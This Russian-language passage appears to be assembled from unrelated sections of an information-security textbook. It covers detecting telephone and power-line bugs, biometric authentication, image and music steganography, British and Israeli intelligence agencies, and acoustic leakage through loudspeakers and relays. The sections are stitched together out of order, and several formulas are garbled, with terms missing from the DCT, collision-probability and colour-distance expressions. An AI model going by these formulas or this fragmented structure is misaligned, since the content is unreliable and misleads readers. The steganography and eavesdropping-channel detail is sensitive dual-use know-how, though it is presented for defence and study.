Основными параметрами радиозакладок, подключаемых к телефонной линии, являются следующие. Для закладок с параллельным включением важным является величина входной емкости, диапазон которой может изменяться в пределах от 20 до 1000 пФ и более, и входное сопротивление, величина которого составляет сотни кОм. Для закладок с последовательным включением основным является ее сопротивление, которое может составлять от сотен Ом в рабочем до нескольких МОм в дежурном режимах.
Телефонные адаптеры с внешним источником питания, гальванически подключаемые к линии, имеют большое входное сопротивление до нескольких МОм (в некоторых случаях и более 100 МОм) и достаточно малую входную емкость.
Важное значение имеют энергетические характеристики средств съема информации, а именно потребляемый ток и падение напряжения в линии.
Наиболее информативным легко измеряемым параметром телефонной линии является напряжение в ней при положенной и поднятой телефонной трубке. Это обусловлено тем, что в состоянии, когда телефонная трубка положена, в линию подается постоянное напряжение в пределах 60–64 В (для отечественных АТС) или 25–36 В (для импортных мини-АТС, в зависимости от модели). При поднятии трубки напряжение в линии уменьшается до 10–12 В.
Если к линии будет подключено закладное устройство, эти параметры изменятся (напряжение будет отличаться от типового для данного телефонного аппарата).
В табл. 16.4 приведены экспериментально полученные значения падения напряжения на линии для некоторых телефонных закладок.
Таблица 16.4. Экспериментально
полученные значения падения напряжения на
линии при подключении к ней некоторых типов телефонных закладок
Тип закладки |
Напряжение в линии |
|||||
Трубка лежит |
Трубка снята |
|||||
U, B |
?U, B |
?U,% |
U, B |
?U, B |
?U, % |
|
Закладки нет |
63,7 |
0 |
0,00 |
10,4 |
0 |
0,00 |
С последовательным включением, параметрическая стабилизация частоты (f =140MTu) |
63,2 |
–0,5 |
–0,78 |
9,9 |
–0,5 |
–4,81 |
С последовательным включением, кварцевая стабилизация частоты (f = 140МГц) |
61,8 |
–1,9 |
–2,98 |
10 |
–0,4 |
–3,85 |
С последовательным включением, кварцевая стабилизация частоты (f = 472 МГц) |
62,5 |
–1,2 |
–1,88 |
9,7 |
–0,7 |
–6,73 |
Окончание таблицы 16.4
Тип закладки |
Напряжение в линии |
|||||
Трубка лежит |
Трубка снята |
|||||
U, B |
?U, B |
?U,% |
U, B |
?U, B |
?U, % |
|
С параллельным включением, кварцевая стабилизация частоты (f = 640 МГц) |
61,7 |
–2 |
–3,14 |
9,3 |
–1,1 |
–10,58 |
Комбинированная с параллельным включением, параметрическая ста-билизация частоты (f = 140 МГц) |
61,9 |
–1,8 |
–2,83 |
10,3 |
–0,1 |
–0,96 |
Комбинированная с параллельным включением, кварцевая стабилизация частоты (f = 420 МГц) |
62,1 |
–1,6 |
–2,51 |
9,4 |
–1 |
–9,62 |
"Телефонное ухо" |
60 |
–3,7 |
–5,81 |
— |
— |
— |
При подключении к телефонной линии закладного устройства изменяется и величина потребляемого тока (при поднятии трубки телефонного аппарата). Величина отбора мощности из линии зависит от мощности передатчика закладки и его коэффициента полезного действия.
При параллельном подключении радиозакладки потребляемый ток (при поднятой телефонной трубке), как правило, не превышает 2,5–3,0 мА.
При подключении к линии телефонного адаптера, имеющего внешний источник питания и большое входное сопротивление, потребляемый из линии ток незначителен (20–40 мкА).
Комбинированные радиозакладки с автономными источниками питания и параллельным подключением к линии, как правило, имеют высокое входное сопротивление (несколько МОм и более) и практически не потребляют энергию из телефонной линии.
Измеряя ток в линии при снятии телефонной трубки и сравнивая его с типовым, можно выявить факт подключения закладных устройств с током потребления более 500–800 мкА.
Для измерения напряжения и тока утечки в линии может использоваться, например, прибор ТСМ-03.
Определение техническими средствами контроля закладных устройств с малым током потребления из линии ограничено собственными шумами линии, вызванными нестабильностью как статических, так и динамических параметров линии. К нестабильности динамических параметров в первую очередь относятся флюктуации тока утечки в линии, величина которого достигает 150 мкА.
Для контроля линий связи необходимо иметь ее схему и “паспорт”. На схеме (выполненной в масштабе) графически или в виде таблицы указываются все санкционированные соединения: распределительные коробки, щиты, параллельные отводы, блокираторы и т.п. с указанием дальности от розетки до соединений. Под “паспортом” обычно понимаются измеренные параметры линии.
Лишь при наличии схемы и “паспорта” производится контроль линии техническими средствами.
Если линия предварительно была очищена и паспортизована, то одним из способов выявления подключаемых к линии средств съема информации является измерение электрофизических параметров линии, к которым относятся емкость, индуктивность и сопротивление линии.
По этому методу измеряются общая емкость линии от телефонного аппарата до распределительного щита и сопротивление линии при ее отключении (размыкании) и замыкании на распределительном щитке.
В дальнейшем контроль линии заключается в периодической проверке ее электрофизических параметров.
При включении в линию любого несанкционированного средства происходит изменение ее параметров, которые могут быть обнаружены, в том числе замером изменения емкости или сопротивления. Например, при отключении (размыкании) линии на распределительном щитке ее сопротивление или будет стремиться к бесконечности при отсутствии в линии параллельно подключенного закладного устройства, или будет равно входному сопротивлению данного устройства при его подключении. Измеряя сопротивление линии при ее замыкании на распределительном щитке, легко обнаружить последовательно подключенные закладные устройства.
Эффективность данного метода достаточно высока, однако она ограничена флюктуациями статических параметров линии.
К типовым устройствам контроля параметров телефонной линии относится телефонное проверочное устройство ТПУ-5.
Наиболее эффективным способом обнаружения подключаемых к телефонной линии средств съема информации является использование локаторов проводных линий.
Методы определения факта негласного подключения к линии с использованием нелинейного локатора будут определяться принципами его функционирования.
Например, при применении нелинейного локатора “Визир” для проверки телефонной линии необходимо ее разъединить и отключить от нее телефонный аппарат, подключив вместо него эквивалентную нагрузку. Разъединение (отключение телефонной линии) целесообразно проводить на вводной распределительной коробке (щитке) здания. Подключение локатора к линии осуществляется в месте ее разъединения.
При обнаружении факта подключения к линии средства съема информации его поиск осуществляется визуально и производится путем последовательного осмотра телефонного кабеля от места расположения телефонного аппарата до центрального распределительного щитка здания.
С помощью нелинейного локатора “Визир” можно установить только факт негласного подключения к линии средства съема информации, а при использовании локатора телефонных линий “Бор-1” возможно определение и дальности до места подключения закладного устройства с ошибкой 2–5 м, что значительно облегчает визуальный поиск и сокращает его время.
Аналогичным образом проводится анализ силовых линий. При их проверке необходимо строго соблюдать правила электробезопасности. Данный вид работ необходимо проводить двумя операторами.
Перед обследованием необходимо изучить схему электропроводки обследуемых помещений и проверить линии на соответствие этой схеме.
Обследование электросиловых линий удобнее всего проводить от распределительного щита. Как правило, процедура проверки состоит в том, что в обследуемой линии вычленяется проверяемый участок, который отключается от источника питающего напряжения.
От обследуемой линии отключаются все электрические приборы (легальные нагрузки), все выключатели устанавливаются во включенное положение. Кроме того, если, обследуемый участок электросети содержит люстру или бра, то из них необходимо вывернуть все лампы, а все выключатели поставить в положение “включено”, так как закладка может быть установлена внутри их корпусов.
Отключенные от обследуемой линии электрические приборы и другие нагрузки должны также быть обследованы.
Далее проводится проверка обследуемого участка линии с использованием нелинейного локатора “Визир”, который подключается к разъемам одного конца проверяемого участка линии, а к разъемам другого конца линии подключается испытательная нагрузка.
После обследования линии нелинейным локатором измеряются ее параметры (сопротивление и емкость) при разомкнутом и замкнутом состояниях.
Измерение тока утечки в электросиловой линии производится без ее отключения от источника питающего напряжения. Но при этом от линии должны быть отключены все электрические и осветительные приборы (легальные нагрузки).
Данные измерений заносятся в “паспорт” линии. Для измерения в линии тока утечки может использоваться прибор ТСМ-03.
Для выявления проводных линий, к которым подключены “пассивные” микрофоны, используются поисковые приборы, оснащенные высокочувствительными усилителями низкой частоты. К таким средствам контроля относятся: поисковые приборы ПСЧ-5, СРМ-700, ТСМ-О3, акустический спектральный коррелятор OSR-5000 “OSCOR”, специальные низкочастотные усилители “Хорда”, “Бумеранг” и др.
Метод выявления проводных линий, к которым подключены “пассивные” микрофоны, основан на выявлении в них информационных низкочастотных сигналов. Для этого необходимо убедиться, что в обследуемой линии отсутствует высокое напряжение. Если в линии отсутствует постоянное напряжение, то для активизации электретных микрофонов в нее необходимо подать напряжение +3–5 В. Затем к ней подключается поисковый прибор. Если в динамике (головных телефонах) прибора прослушиваются характерные звуковые сигналы (шумы помещения, речь, тестовый акустический сигнал) или свист переменного тона (эффект акустической “завязки”), то к линии подключен микрофон.
Далее поиск подключенных к линии микрофонов осуществляется путем визуального осмотра линии по всей ее длине. Выявляется не только место подключения к линии микрофона, но и место установки записывающей или передающей аппаратуры.
Для проверки проводных линий на наличие в них сигналов высокой частоты, модулированных информационным сигналом, используются: индикаторы поля типа D-008, СРМ-700, поисковые приборы типа ПСЧ-5, ТСМ-ОЗ, Scanlock ECM, программно-аппаратные комплексы типа АРК-Д1_12, “КРОНА-4” и др.
Поисковый прибор подключают к проводным линиям с использованием специальных электрических щупов. При подключении к силовой линии необходимо соблюдать правила электробезопасности.
Путем перестройки приемника прибора во всем диапазоне его рабочих частот производится поиск сигналов закладных устройств. При (обнаружении сигнала оператор осуществляет его слуховой контроль и при необходимости подстраивает частоту сигнала и выбирает нужного вида детектор (FM или AM), обеспечивающий оптимальную демодуляцию принимаемого сигнала. Если в динамике (головных телефонах) прибора прослушиваются характерные звуковые сигналы помещения или тестовый акустический сигнал, то начинается поиск закладки.
Поиск и локализация закладки производится путем подключения прибора к различным точкам силовой сети или слаботочной проводной линии с одновременным контролем уровня прослушиваемых сигналов.
После предварительного определения места расположения закладки дальнейший ее поиск осуществляется визуальным осмотром данного участка проводной линии.
При осмотре проводных линий следует особое внимание уделять вопросам безопасности от поражения электрическим током.
Методы опознавания АС и ееэлементов пользователем
Такое опознавание необходимо для того, чтобы пользователь мог убедиться в том, что предоставляемые ему ресурсы есть именно те, которые предназначены для работы с ним, а не являются ложными, фальсифицированными злоумышленником для получения секретных данных, в том числе и паролей.
Опознавание пользователем системы и ее отдельных элементов также можно осуществить с помощью паролей, только в этом случае сама система будет предъявлять свой код (пароль) пользователю. Совершенно очевидно, что пользователь должен знать такой пароль заранее. Такой метод опознавания при большом числе пользователей не может быть надежным.
Наиболее эффективным методом решения рассматриваемой задачи в настоящее время считается реализация так называемой “схемы рукопожатия”. При ее реализации заранее выбирается не очень сложное, но далеко не тривиальное преобразование А(х, кt), где х — аргумент, а кt — ключ, зависящий от текущего времени. Это преобразование должно содержаться в секрете, но быть известным пользователю, и системе. Пользователь вместе с запросом на работу посылает выбранное им значение аргумента х (например, свое имя). Система вычисляет Ас
(х, кt) и посылает это значение пользователю. Пользователь вычисляет Ап
(х, кt). Если Ас = Ап, опознавание считается положительным (“рукопожатие состоялось”).
Такая схема опознавания может быть достаточно эффективной даже при большом числе пользователей, поскольку для каждого пользователя нетрудно подобрать отдельное преобразование. Особенно просто реализуется режим “рукопожатия” при наличии шифровальной аппаратуры, сопрягаемой как с терминалом, так и с АС. Тогда в качестве преобразования А(х, кt) может использоваться криптографическое преобразование, реализуемое в имеющейся криптографической системе.
Методы особого надежного опознавания
Особо надежное опознавание должно использоваться в случае обработки информации повышенной секретности, особенно в случае работы в режиме удаленного доступа. При этом используются сугубо индивидуальные характеристики человека: голос, отпечатки пальцев, сетчатка глаза, фотография, личная подпись и т.п.
Реализация методов опознавания по перечисленным характеристикам сопряжена с решением двух групп проблем: проблемы снятия индивидуальных характеристик человека в процессе опознавания и проблемы анализа и обработки полученных характеристик.
При опознавании пользователя по голосу в памяти АС заранее формируется эталон его голоса, для чего пользователь должен произнести перед микрофоном заданную совокупность фраз. В процессе опознавания АС сравнивает произносимые фразы с хранимыми эталонными и принимает решение об опознавании.
Надежность распознавания по голосу в идеальных условиях достаточно высока, однако на нее оказывают значительное влияние такие факторы, как изменение голоса при простуде и некоторых других заболеваниях (а возможно и просто от усталости), возможность имитации голоса злоумышленником. По этим причинам опознавание по голосу до последнего времени не получило широкого распространения.
Опознавание по отпечаткам пальцев и по сетчатке глаза, наиболее традиционный метод опознавания, основанный на общеизвестном факторе, что отпечатки и сетчатка являются строго индивидуальными характеристиками человека. При надлежащей обработке отпечатков и сетчатки надежность опознавания может быть весьма высокой. Схема процедуры опознавания для этого случая понятна и общеизвестна. Основную трудность при решении этой задачи составляет преобразование рисунков отпечатков пальцев и сетчатки глаза в цифровую форму для последующей их обработки на ЭВМ. Разработка и реализация программного обеспечения для решения этой задачи не представляет особых трудностей.
Опознавание по длине пальцев основывается на менее очевидном и менее известном факте — длина пальцев, и соотношение длин отдельных пальцев также являются индивидуальными характеристиками человека.
Измерение длины четырех пальцев ( без большого) позволяет опознать человека с вероятностью не ниже 95%. В то же время устройство для измерения длины пальцев является настолько простым, что им можно оборудовать даже небольшие терминалы пользователей.
Опознавание по фотографии связано с наличием в строении лица устойчивых индивидуальных характеристик, совокупность которых не может быть имитирована даже при искусном гримировании. В эту совокупность входят: строение и расположение ушей, геометрические соотношения черт лица, снятого в анфас и в профиль, геометрические параметры положения глаз и т.п.
Аналогично приведенным выше методом может производится опознание по личной подписи, причем в системах такого типа используются не только геометрические характеристики подписи, но и динамические характеристики процесса ее написания. Эти параметры также образуют совокупность характеристик, позволяющих достаточно надежно произвести опознавание пользователя.
Следует отметить, что высокую надежность опознавания может обеспечить только комбинированная система, использующая несколько различных методов, хотя она и будет достаточно сложной и дорогой.
Методы сокрытия в частотной области изображения
Как уже отмечалось, стеганографические методы замены неустойчивы к любым искажениям, а применение операции сжатия с потерями приводит к полному уничтожению всей секретной информации, скрытой методом НЗБ в изображении. Более устойчивыми к различным искажениям, в том числе сжатию, являются методы, которые используют для сокрытия данных не временную область, а частотную.
Существуют несколько способов представления изображения в частотной области. Например, с использованием дискретного косинусного преобразования (ДКП), быстрого преобразования Фурье или вейвлет-преобразования. Данные преобразования могут применяться как ко всему изображению, так и к некоторым его частям. При цифровой обработке изображения часто используется двумерная версия дискретного косинусного преобразования:
S(u, v) = C(u) C(v) cos cos,
S(x, y) = cos cos,
где C(u)=1/, если u=0 и C(u)=1 в противном случае.
Один из наиболее популярных методов сокрытия секретной информации в частотной области изображения основан на относительном изменении величин коэффициентов ДКП. Для этого изображение разбивается на блоки размером 8´8 пикселей. Каждый блок предназначен для сокрытия одного бита секретного сообщения. Процесс сокрытия начинается со случайного выбора блока bi, предназначенного для кодирования i-го бита сообщения. Для выбранного блока изображения bi проводится ДКП: Bi = D{bi}. При организации секретного канала абоненты должны предварительно договориться о конкретных двух коэффициентах ДКП, которые будут использоваться для сокрытия секретных данных. Обозначим их как (u1, v1) и (u2, v2). Эти два коэффициента должны соответствовать косинус-функциям со средними частотами, что обеспечит сохранность информации в существенных областях сигнала, которая не будет уничтожаться при JPEG-сжатии. Так как коэффициенты ДКП-средних являются подобными, то процесс сокрытия не внесет заметных изменений в изображение.
Если для блока выполняется условие Bi(u1, v1) > Bi(u2,v2), то считается, что блок кодирует значение 1, в противном случае — 0. На этапе встраивания информации выбранные коэффициенты меняют между собой значения, если их относительный размер не соответствует кодируемому биту. На шаге квантования JPEG-сжатие может воздействовать на относительные размеры коэффициентов, поэтому, прибавляя случайные значения к обеим величинам, алгоритм гарантирует что |Bi(u1, v1) – Bi(u2,v2)|> x, где x > 0. Чем больше x, тем алгоритм будет более устойчивым к сжатию, но при этом качество изображения ухудшается. После соответствующей корректировки коэффициентов выполняется обратное ДКП.
Извлечение скрытой информации проводится путем сравнения выбранных двух коэффициентов для каждого блока.
Методы замены
Общий принцип данных методов заключается в замене избыточной, малозначимой части изображения битами секретного сообщения. Для извлечения сообщения необходимо знать место, где была размещена скрываемая информация.
Наиболее распространенным методом этого класса является метод замены наименьшего значащего бита (НЗБ).
Популярность метода НЗБ обусловлена его простотой и тем, что он позволяет скрывать в относительно небольших файлах довольно большие объемы информации. Данный метод обычно работает с растровыми изображениями, которые представлены в формате без сжатия (например, GIF и BMP). Основным его недостатком является сильная чувствительность к малейшим искажениям контейнера. Для ослабления этой чувствительности часто применяют помехоустойчивое кодирование.
Суть метода НЗБ заключается в замене наименее значащих битов пикселей изображения битами секретного сообщения. В простейшем случае проводится замена НЗБ всех последовательно расположенных пикселей изображения. Однако, так как длина секретного сообщения обычно меньше количества пикселей изображения, то после его внедрения в контейнере будут присутствовать две области с различными статистическими свойствами (область, в которой незначащие биты были изменены, и область, в которой они не менялись). Это может быть легко обнаружено с помощью статистических тестов. Для создания эквивалентного изменения вероятности всего контейнера секретное сообщение обычно дополняют случайными битами так, чтобы его длина в битах была равна количеству пикселей в исходном изображении.
Другой подход, метод случайного интервала, заключается в случайном распределении битов секретного сообщения по контейнеру, в результате чего расстояние между двумя встроенными битами определяется псевдослучайно. Эта методика наиболее эффективна при использовании потоковых контейнеров (видео).
Для контейнеров произвольного доступа (изображений) может использоваться метод псевдослучайной перестановки.
Его суть заключается в том, что генератор псевдослучайных чисел производит последовательность индексов j1, ..., jl(m) и сохраняет k-й бит сообщения в пикселе с индексом jk.
Однако в этом случае один индекс может появиться в последовательности более одного раза, т.е. может произойти “пересечение” — искажение уже встроенного бита. Если число битов сообщения намного меньше размера изображения, то вероятность пересечения незначительна, и поврежденные биты могут быть восстановлены с помощью корректирующих кодов. Вероятность, по крайней мере, одного пересечения оценивается как
p » 1 – exp, при условии, что l(m)<< l(c).
При увеличении l(m) и l(c)=const данная вероятность стремится к единице. Для предотвращения пересечений необходимо сохранять все индексы использованных элементов ji и перед сокрытием нового пикселя проводить проверку его на повторяемость.
Еще один подход в реализации метода замены (метод блочного сокрытия) состоит в следующем. Исходное изображение-контейнер разбивается на l(m) непересекающихся блоков Ii
произвольной конфигурации и для каждого из них вычисляется бит четности p(Ii):
p(I) =
В каждом блоке проводится сокрытие одного секретного бита mi. Если бит четности p(Ii) блока Ii
не совпадает с секретным битом mi, то происходит инвертирование одного из НЗБ блока Ii, в результате чего p(Ii) = mi. Выбор блока может производиться случайно с использованием стегоключа. Хотя этот метод обладает такой же устойчивостью к искажениям, как и все предыдущие, он имеет ряд преимуществ. Прежде всего, имеется возможность изменять значения такого пикселя в блоке, для которого статистика контейнера изменится минимально. Кроме того, влияние последствий встраивания секретных данных в контейнер можно уменьшить за счет увеличения размера блока.
Методы замены палитры. Для сокрытия данных можно также воспользоваться палитрой цветов, которая присутствует в формате изображения.
Палитра из N цветов определяется как список пар индексов (i, ci), который определяет соответствие между индексом i и его вектором цветности ci. В изображении каждому пикселю присваивается индекс в палитре. Так как цвета в палитре не всегда упорядочены, то скрываемую информацию можно кодировать последовательностью хранения цветов в палитре.
Существует N! различных способов перестановки N-цветной палитры, что вполне достаточно для сокрытия небольшого сообщения. Однако методы сокрытия, в основе которых лежит порядок формирования палитры, также неустойчивы: любая атака, связанная с изменениями палитры, уничтожает секретное сообщение.
Зачастую соседние цвета в палитре не обязательно являются схожими, поэтому некоторые стеганометоды перед сокрытием данных проводят упорядочивание палитры так, что смежные цвета становятся подобными. Например, значения цвета может быть упорядочено по расстоянию d в RGB-пространстве, где d = . Так как орган зрения человека более чувствителен к изменениям яркости цвета, то намного лучше сортировать содержимое палитры по значениям яркости сигнала. После сортировки палитры можно изменять НЗБ индексов цвета без особого искажения изображения.
Некоторые стеганометоды предусматривают уменьшение общего количества значений цветов (до N/2) путем “размывания” изображения. При этом элементы палитры дублируются так, чтобы значения цветов для них различались незначительно. В итоге каждое значение цвета размытого изображения соответствует двум элементам палитры, которые выбираются в соответствии с битом секретного сообщения.
К методам замены можно также отнести метод квантования изображений. Данный метод основан на межпиксельной зависимости, которую можно описать некоторой функцией Q. В простейшем случае, можно рассчитать разность ei между смежными пикселями xi и xi+1 и задать ее в качестве параметра для функции Q: ?i = Q(xi – xi – 1), где ?i
— дискретная аппроксимация разности сигналов xi – xi – 1. Так как ?i является целым числом, а реальная разность xi – xi – 1 — вещественным, то появляется ошибка квантования di = ?i – ei. Для сильно коррелированных сигналов эта ошибка близка к нулю: di » 0. В данном методе сокрытие информации проводится путем корректирования разностного сигнала ?i.
Стегоключ представляет собой таблицу, которая каждому возможному значению ?i
ставит в соответствие определенный бит, например:
?i |
–4 |
–3 |
–2 |
–1 |
0 |
1 |
2 |
3 |
4 |
0 |
1 |
0 |
1 |
1 |
1 |
0 |
0 |
1 |
MI5 (Security Service)
Служба безопасности (по понятным причинам аббревиатура ее англоязычного названия не используется) подотчетна государственному секретарю (секретарю по внутренним делам), но при этом не входит в структуру Управления внутренних дел (Home Office). Службой руководит Генеральный директор (Director General). Оперативное руководство возложено на его заместителя.
В структуре Службы безопасности (рис. 3.11) имеется шесть отделений, возглавляемых директорами, а также отдел юрисконсульта. Генеральный директор, его заместитель, директоры отделений и юрисконсульт составляют Руководящий совет (Management Board), принимающий решения по политическим и стратегическим вопросам.
Исполнительным органом Службы безопасности является спецподразделение, входящее в состав Скотланд-Ярда. Только оно имеет право проводить аресты и представлять MI5 в суде. Спецподразделение занимается борьбой с ирландскими террористами, а также предотвращением подрывных акций иностранных разведок (в недавнем прошлом, в основном, советских).
Служба безопасности работает в тесном контакте с SIS и спецслужбами Вооруженных Сил. Доступ к разведывательной информации, собираемой другими спецслужбами, предоставляется сотрудникам Службы безопасности только для проведения расследований в рамках их компетенции.
Рис. 3.11. Структура Службы безопасности (MI5)
MI6 (SIS)
Служба SIS занимается внешней разведкой. Первым директором Бюро секретной службы (Secret Service Bureau), предшественника SIS, был капитан Королевского флота Мэнсфилд Камминг (Mansfield Cumming). Все документы он подписывал серыми чернилами, ставя в качестве подписи первую букву своей фамилии — “C”. С тех пор всех Генеральных директоров SIS называют “С”, а изображение серой буквы “C” вынесено на эмблему SIS.
Хотя служба SIS включена в состав Управления по иностранным делам и Содружеству (Министерство иностранных дел Великобритании), Генеральный директор SIS по многим вопросам может связываться непосредственно с премьер-министром или действовать самостоятельно. Подчиненность SIS внешнеполитическому ведомству позволяет ее сотрудникам при работе в других странах пользоваться дипломатическим прикрытием.
В структуре SIS пять управлений и несколько вспомогательных отделов.
Управление подготовки заданий и анализа разведывательной информации. Готовит задания для добывающих подразделений в соответствии с указаниями, полученными от политического и военного руководства Великобритании. Анализирует собранную информацию и готовит обзоры, отчеты, сводки и другие документы.
Управление регионов. Состоит из отделов, работающих по отдельным географическим регионам мира.
Управление внешней разведки и безопасности. Занимается противодействием иностранным разведкам, а также оперативным обеспечением сотрудников SIS.
Управление специальной разведки. Отвечает за разработку и применение в оперативной работе технических средств специального назначения.
Административное управление. Отвечает за административное обеспечение основных управлений SIS, а также за подбор и расстановку кадров.
Помимо управлений, в структуре SIS имеются самостоятельные отделы, такие как отдел по международным отношениям и отдел по связям с другими спецслужбами.
SIS — одна из старейших спецслужб мира, оказавшая влияние на развитие спецслужб США, Канады, Австралии и Новой Зеландии. Не удивительно, что SIS тесно сотрудничает с ними, обмениваясь добываемой разведывательной информации и согласовывая свои действия.
Микрофонный эффект громкоговорителей
Динамические головки прямого излучения, устанавливаемые в абонентских громкоговорителях, имеют достаточно высокую чувствительность к акустическому воздействию (2–3 мВ/Па) и сравнительно равномерную в речевом диапазоне частот амплитудно-частотную характеристику, что обеспечивает высокую разборчивость речевых сигналов.
E = hP, h= ,
где h— акустическая чувствительность звонка, I — длина проводника, движущегося в магнитном поле с индукцией B; B — магнитная индукция; S — площадь поверхности, подверженной влиянию давления акустического поля; Z — механическое сопротивление.
Рис. 6.19. Схема возникновения ЭДС на громкоговорителе
Известно, что абонентские громкоговорители бывают одно- и многопрограммными. В частности, территории бывшего СССР достаточно широко распространены трехпрограммные громкоговорители.
Трехпрограммные абонентские громкоговорители, в соответствии с ГОСТ 18286-88 (“Приемники трехпрограммные проводного вещания. Общие технические условия”), имеют основной канал (НЧ) и каналы радиочастоты (ВЧ), включенные через усилитель-преобразователь. Усилитель-преобразователь обеспечивает преобразование ВЧ сигнала в НЧ сигнал с полосой » 100–6300 Гц за счет использования встроенных гетеродинов. Так, например, в трехпрограммном громкоговорителе “Маяк 202” используется два гетеродина для второй и третьей программ ВЧ. Один вырабатывает частоту 78 кГц, а другой — 120 кГц.
Наличие сложной электронной схемы построения трехпрограммных громкоговорителей (обратные связи, взаимные переходы, гетеродины) способствует прямому проникновению сигнала, наведенного в динамической головке, на вход устройства (в линию). Не исключается и излучение наведенного сигнала на частотах гетеродина (78 и 120 кГц).
Микрофонный эффект электромеханического звонка телефонного аппарата
Электромеханический вызывной звонок телефонного аппарата — типичный образец индуктивного акустоэлектрического преобразователя, микрофонный эффект которого проявляется при положенной микротелефонной трубке.
ЭДС микрофонного эффекта звонка (рис. 6.17) может быть определена по формуле:
E = hP,
где h— акустическая чувствительность звонка, P — акустическое давление.
h = ,
где V — магнитодвижущая сила постоянного магнита; S — площадь якоря (пластины); m — магнитная проницаемость сердечника; N — количество витков катушки; S — площадь полосного наконечника; d — величина зазора; Z — механическое сопротивление.
По такому же принципу (принципу электромеханического вызывного звонка) образуется микрофонный эффект и в отдельных типах электромеханических реле различного назначения и даже в электрических вызывных звонках бытового назначения.
Акустические колебания воздействуют на якорь реле (рис. 6.18). Колебания якоря изменяют магнитный поток реле, замыкающийся по воздуху, что приводит к появлению на выходе катушки реле ЭДС микрофонного эффекта.
Рис. 6.17. Схема возникновения ЭДС на вызывном звонке | Рис. 6.18. Схема возникновения ЭДС на реле |
Микрофонный эффект вторичных электрочасов
Исполнительное устройство вторичных электрочасов представляет собой шаговый электродвигатель, управляемый трехсекундными разнополярными импульсами U = ±24 В, поступающими с интервалом 57 с от первичных электрочасов.
Микрофонный эффект вторичных часов, обусловленный акустическим эффектом шагового электродвигателя (рис. 6.20), проявляется в основном в интервалах ожидания импульсов управления.
Рис. 6.20. Схема возникновения ЭДС на шаговом двигателе
Степень проявления микрофонного эффекта вторичных электрочасов существенно зависит от их конструкции, т.е. выполнены ли они в пластмассовом, деревянном или металическом корпусе; с открытым или закрытым механизмом; с жестким или подвесным креплением.
Глава 7
Классификация электрических каналов утечки информации
Многоканальная фильтрация
Необходимость в многоканальной (многодатчиковой) системе обусловлена естественной потребностью контроля пространства, превышающего радиус обнаружения однодатчиковой системы. Однако, помимо этого, многоканальность способна придать системе совершенно новые возможности, в частности, компенсировать помехи.
Использование многоканальности для фильтрации помех базируется на различии действия ближних и дальних источников на систему. Мощный дальний источник воспринимают все датчики, в то время как слабый ближний сигнал от диктофона — всего один-два датчика. Тогда, сопоставив спектры сигналов различных каналов, можно разделить действия помех и диктофонов. По существу, это является обобщением принципа градиентометрии. Опорный и сигнальный каналы образуют своеобразный градиентометр, в котором спектр фона предсказывается по сигналу опорного канала. Отклонение от фона в сигнальном канале свидетельствует о наличии ближнего источника.
Дополнительные возможности отстройки от помех дают методы многоканальной адаптивной фильтрации.
Таким образом, последовательное применение различных технологий позволяет приблизиться к предельной дальности обнаружения.
Рассмотренные принципы обнаружения диктофонов применены в новой офисной системе PTRD 018, построенной на базе микропроцессора 80С25SB.
Цифровые технологии, реализованные в данной модели, позволяют охватить до 16-ти посадочных мест, что в восемь раз превышает возможности аналоговых моделей. Применение рассмотренных методов обработки сигналов обеспечивает нормальную работу прибора даже в помещениях с очень неблагоприятной помеховой обстановкой, при этом ложные срабатывания при соблюдении правил эксплуатации крайне маловероятны. Дальность обнаружения при благоприятных условиях достигает 1,5 м для каждого датчика, что на данный момент является наилучшим результатом.
Моссад
В Моссад использутся все три основных метода добывания секретной информации: агентурная сеть, сбор данных из открытых источников и радиоэлектронная разведка.
В структуру Моссад входят восемь отделов, но более или менее точная информация имеется лишь о некоторых из них.
Отдел по сбору информации. Самое большое подразделение Моссад, отвечающее за добывание информации офицерами, действующими как под дипломатическим, так и неофициальным прикрытием. Отдел работает по секциям, соответствующим географическим регионам, и руководит работой резидентов и их агентурой. Населенные пункты, в которых работают резидентуры, называются “станциями”.
Отдел по политическим акциям и взаимодействию. Занимается вопросами совместных политических операций и обеспечения взаимодействия с разведслужбами дружественных государств, а также с государствами, с которыми Израиль не имеет дипломатических отношений. В крупных станциях (Париж, Лондон и т.п.) Моссад обычно создает под дипломатическим прикрытием две резидентуры — одна работает в интересах отдела по сбору информации, а другая — в интересах отдела по политическим акциям и взаимодействию.
Отделение специальных операций (Мецада). Занимается самыми секретными операциями, такими как организация покушений, диверсий, а также партизанских и психологических операций.
Отдел ЛАП (Лохаман Псиклогит). Отвечает за психологическую войну, пропаганду и дезинформацию.
Исследовательский отдел. Занимается анализом информации, поступающий от добывающих подразделений, и готовит ежедневные, еженедельные и ежемесячные сводки и отчеты. Отдел состоит из 15-ти специализированных секций, в которых ведется анализ информации о США, Канаде и Западной Европе, Латинской Америке, государствах бывшего СССР, Китаю, Африке, государствам Магреб (Морокко, Алжир и Тунис), Ливии, Ираку, Иордании, Сирии, Саудовской Аравии, Объединенным Арабским Эмиратам и Ирану. Анализ разведданных по вопросам ядерных вооружений выделен в отдельную секцию.
Технологический отдел. Отвечает за разработку и внедрение передовых технологий, обеспечивающих операции Моссад.
Музыкальные стегосистемы
Музыкальная форма звуковой среды занимает большую часть информационного пространства Internet. Помимо этого она широко используется в радиосетях общего назначения и распространяется на электронных носителях информации, которые, в связи с развитием компьютерной техники, получили широкое распространение. В связи с этим использование музыкальной среды для сокрытия информационных сообщений представляется достаточно перспективным. Для сокрытия данных помимо методов, описанных выше, можно применять методы, основанные на модификации тех параметров музыкальной среды, которые в теории музыки можно описать качественно. Музыкальная среда имеет свое текстовое отображение в виде нот и других знаков, которые позволяют достаточно адекватно отображать музыкальное произведение и его внутреннюю структуру такими элементами, как ноты, гаммы, периоды, такты, каденции, аккорды, мотивы, модуляции, тональности, различные виды развития, секвенции и пр. Построения музыкальных фрагментов подчиняются синтаксическим правилам, которые можно описать, что позволяет строить логические взаимоотношения и, соответственно, описание структур музыкальных произведений.
Музыкальные стегосистемы обеспечивают сокрытие информации в музыкальной среде по аналогии с импровизацией музыкальных произведений. По существу импровизация представляет собой такое изменение музыкального произведения или его фрагментов, которое сохраняет основные темы первоначального произведения в виде мелодий, но при этом расширяет образ музыкальной темы другими, дополняющими основной образ чертами, которых не было в основном музыкальном произведении. Основное отличие музыкальной стеганографии от импровизации состоит в том, что целью является не расширение образов базового музыкального произведения, а внесение изменений, которые сохраняют мелодию основного произведения, соответствуют всем правилам построения данного произведения и при этом кодируют скрываемое сообщение, не искажая главной темы произведения.
Фрагмент музыкального произведения может быть описан в виде некоторой логической структуры.
